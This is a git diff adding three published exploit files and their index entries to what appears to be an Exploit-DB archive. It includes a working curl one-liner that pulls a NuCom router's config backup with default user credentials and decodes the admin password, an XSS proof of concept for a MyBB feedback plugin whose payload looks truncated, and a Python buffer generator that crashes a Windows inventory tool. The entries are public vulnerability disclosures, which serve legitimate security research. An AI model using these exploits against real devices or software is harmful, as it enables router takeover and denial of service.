diff --git a/exploits/hardware/webapps/49634.txt b/exploits/hardware/webapps/49634.txt new file mode 100644 index 000000000..c09f207cf --- /dev/null +++ b/exploits/hardware/webapps/49634.txt @@ -0,0 +1,61 @@ +# Exploit Title: NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation +# Date: 01.03.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.nucom.es + + + + +Vendor: NUEVAS COMUNICACIONES IBERIA, S.A. +Product web page: https://www.nucom.es +Affected version: 5.07.90_multi_NCM01 + 5.07.89_multi_NCM01 + 5.07.72_multi_NCM01 + +Summary: The NC routers upgrades your network to the next +generation of WiFi. With combined wireless speeds of up to +1750 Mbps, the device provides better speeds and wireless +range. Includes 2 FXS ports for any VoIP service. If you +prefer a wired connection, the NC routers have gigabit +ports to provide an incredibly fast, lag-free experience. +3.0 ports allow you to power a robust home Internet network +by sharing printers, flash storage, FTP servers, or media +players. + +Desc: The application suffers from a privilege escalation +vulnerability. The non-privileged default user (user:user) +can elevate his/her privileges by sending a HTTP GET request +to the configuration backup endpoint and disclose the http +super password (admin credentials) in Base64 encoded value. +Once authenticated as admin, an attacker will be granted +access to the additional and privileged pages. + +Tested on: GoAhead-Webs + Tenda + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5629 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php + + +01.03.2021 + +-- + + +lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \ +> curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \ +> -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \ +> grep -oP '(?<=http_supper_passwd=).*' | \ +> base64 -d 2>/dev/null | \ +> xargs echo -n ; \ +> echo -e '\n-----------\n' +The admin password is: +MammaMia123 +----------- + +lqwrm@metalgear:~/prive$ \ No newline at end of file diff --git a/exploits/php/webapps/49635.txt b/exploits/php/webapps/49635.txt new file mode 100644 index 000000000..0ce124b3d --- /dev/null +++ b/exploits/php/webapps/49635.txt @@ -0,0 +1,19 @@ +# Exploit Title: MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting +# Date: 1/30/2021 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=1220 +# Version: 1.8.22 +# Tested on: Windows 10 +# CVE: CVE-2021-28115 + +1. Description: +This plugin adds a feedback system to your forum. Edit feedback button is vulnerable to XSS. + +2. Proof of Concept: + +- Go to a user profile +- Add feedback and leave the following payload as comment "> +- View the feedback feedback.php?uid=2 +- When clicking Edit payload will execute \ No newline at end of file diff --git a/exploits/windows/dos/49638.py b/exploits/windows/dos/49638.py new file mode 100755 index 000000000..8e18e5930 --- /dev/null +++ b/exploits/windows/dos/49638.py @@ -0,0 +1,29 @@ +# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC) +# Exploit Author : Enes Özeser +# Exploit Date: 2021-02-28 +# Vendor Homepage : https://www.nsauditor.com/ +# Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe +# Version: 1.6.4.0 +# Tested on: Windows 10 + +# Steps: +1- Run the python script. (payload.py) +2- Open payload.txt and copy content to clipboard. +3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'. +4- Register -> Enter Registeration Code +5- Paste clipboard into the "Key" or "Name". +6- Click on OK. +7- Crashed. + +---> payload.py <-- + +#!/usr/bin/env python +buffer = "\x41" * 300 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print "File created!" +except: + print "File cannot be created!" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9eee078a1..0c2d6f6a4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6773,6 +6773,7 @@ id,file,description,date,author,type,platform,port 49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows, 49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows, 49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows, +49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -43820,3 +43821,5 @@ id,file,description,date,author,type,platform,port 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php, 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php, 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple, +49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",2021-03-11,LiquidWorm,webapps,hardware, +49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",2021-03-11,0xB9,webapps,php,